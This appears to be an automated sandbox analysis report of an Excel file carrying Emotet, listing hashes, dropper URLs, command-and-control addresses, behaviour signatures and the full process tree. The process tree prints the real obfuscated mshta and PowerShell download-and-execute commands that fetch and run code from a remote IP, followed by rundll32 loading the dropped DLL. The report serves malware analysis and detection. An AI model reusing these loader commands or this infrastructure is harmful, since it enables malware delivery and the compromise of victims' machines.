Analysis

  • max time kernel
    59s
  • max time network
    62s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    28-01-2022 01:15

General

  • Target

    2022-1-28-26980baaa937807459e75d434a75aa19.xls

  • Size

    46KB

  • MD5

    26980baaa937807459e75d434a75aa19

  • SHA1

    913a3e83c96ec2e3154c616900db90f3b17d32f4

  • SHA256

    0cce7ccfd9419f3709d66fe83d54693f44c3d44b36f3d631765e8f994e12af24

  • SHA512

    f0f21a84bc43682ac5ba2f67a46005ae1c68518b8611b97691b338da68b344e947ab921c17955bd2f1a6b244588ae357620f940f53d8febdee620ffbf24c276c

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://91.240.118.168/vvv/ppp/fe.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://91.240.118.168/vvv/ppp/fe.png

Extracted

Family

emotet

Botnet

Epoch4

C2

51.15.4.22:443

173.214.173.220:8080

212.237.5.209:443

192.254.71.210:443

216.158.226.206:443

162.243.175.63:443

212.24.98.99:8080

58.227.42.236:80

45.118.115.99:8080

104.251.214.46:8080

185.157.82.209:8080

46.55.222.11:443

188.40.137.206:8080

81.0.236.90:443

103.75.201.2:443

129.232.188.93:443

195.154.133.20:443

159.8.59.82:8080

79.172.212.216:8080

138.185.72.26:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\2022-1-28-26980baaa937807459e75d434a75aa19.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2408
    • C:\Windows\SYSTEM32\CMD.EXE
      CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2256
      • C:\Windows\system32\mshta.exe
        mshta http://91.240.118.168/vvv/ppp/fe.html
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:3868
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1556
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3044
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:2536
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:904
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bvqkhlyhh\cyjvihvq.dex",KCdVvceg
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4076
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Bvqkhlyhh\cyjvihvq.dex",DllRegisterServer
                    9⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2768
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 3868 -s 1680
          4⤵
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1344

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\QWER.dll
    MD5

    568ddf4d26baa3fadb6f5903e18119cc

    SHA1

    c556ef89517f7b5cc51fa96d042958eb553e6519

    SHA256

    74aa2232dc8b7f2c8adf5dc56ab90d92883bf31939ea183609d99a75038b6254

    SHA512

    98f09c6193970cf67a2f392760471e3009501de94189c908b63ee13941a7497ee622ea5798c4c7efc66ebead9d624a95d8c2a5dab633170ae779c869e4ff5df4

  • \ProgramData\QWER.dll
    MD5

    568ddf4d26baa3fadb6f5903e18119cc

    SHA1

    c556ef89517f7b5cc51fa96d042958eb553e6519

    SHA256

    74aa2232dc8b7f2c8adf5dc56ab90d92883bf31939ea183609d99a75038b6254

    SHA512

    98f09c6193970cf67a2f392760471e3009501de94189c908b63ee13941a7497ee622ea5798c4c7efc66ebead9d624a95d8c2a5dab633170ae779c869e4ff5df4

  • \ProgramData\QWER.dll
    MD5

    568ddf4d26baa3fadb6f5903e18119cc

    SHA1

    c556ef89517f7b5cc51fa96d042958eb553e6519

    SHA256

    74aa2232dc8b7f2c8adf5dc56ab90d92883bf31939ea183609d99a75038b6254

    SHA512

    98f09c6193970cf67a2f392760471e3009501de94189c908b63ee13941a7497ee622ea5798c4c7efc66ebead9d624a95d8c2a5dab633170ae779c869e4ff5df4

  • memory/904-338-0x0000000005350000-0x0000000005375000-memory.dmp
    Filesize

    148KB

  • memory/904-336-0x00000000051A0000-0x00000000051C5000-memory.dmp
    Filesize

    148KB

  • memory/904-334-0x0000000005140000-0x0000000005165000-memory.dmp
    Filesize

    148KB

  • memory/904-332-0x00000000050E0000-0x0000000005105000-memory.dmp
    Filesize

    148KB

  • memory/904-330-0x0000000005000000-0x0000000005025000-memory.dmp
    Filesize

    148KB

  • memory/904-328-0x0000000004F20000-0x0000000004F45000-memory.dmp
    Filesize

    148KB

  • memory/904-325-0x0000000004A00000-0x0000000004A25000-memory.dmp
    Filesize

    148KB

  • memory/1556-315-0x0000021EEA700000-0x0000021EEA720000-memory.dmp
    Filesize

    128KB

  • memory/1556-296-0x0000021EECA20000-0x0000021EECA5C000-memory.dmp
    Filesize

    240KB

  • memory/1556-310-0x0000021EECD40000-0x0000021EECDB6000-memory.dmp
    Filesize

    472KB

  • memory/1556-308-0x0000021EEA700000-0x0000021EEA720000-memory.dmp
    Filesize

    128KB

  • memory/1556-307-0x0000021EEA700000-0x0000021EEA720000-memory.dmp
    Filesize

    128KB

  • memory/1556-277-0x0000021EEC0B0000-0x0000021EEC0D2000-memory.dmp
    Filesize

    136KB

  • memory/2408-116-0x00007FF98ABC0000-0x00007FF98ABD0000-memory.dmp
    Filesize

    64KB

  • memory/2408-129-0x00007FF987050000-0x00007FF987060000-memory.dmp
    Filesize

    64KB

  • memory/2408-128-0x00007FF987050000-0x00007FF987060000-memory.dmp
    Filesize

    64KB

  • memory/2408-119-0x00007FF98ABC0000-0x00007FF98ABD0000-memory.dmp
    Filesize

    64KB

  • memory/2408-118-0x00007FF98ABC0000-0x00007FF98ABD0000-memory.dmp
    Filesize

    64KB

  • memory/2408-117-0x00007FF98ABC0000-0x00007FF98ABD0000-memory.dmp
    Filesize

    64KB

  • memory/2408-115-0x00007FF98ABC0000-0x00007FF98ABD0000-memory.dmp
    Filesize

    64KB

  • memory/2536-322-0x0000000004860000-0x0000000004885000-memory.dmp
    Filesize

    148KB

  • memory/2768-342-0x0000000003F60000-0x0000000003F85000-memory.dmp
    Filesize

    148KB

  • memory/2768-344-0x0000000004520000-0x0000000004545000-memory.dmp
    Filesize

    148KB

  • memory/4076-340-0x0000000004270000-0x0000000004295000-memory.dmp
    Filesize

    148KB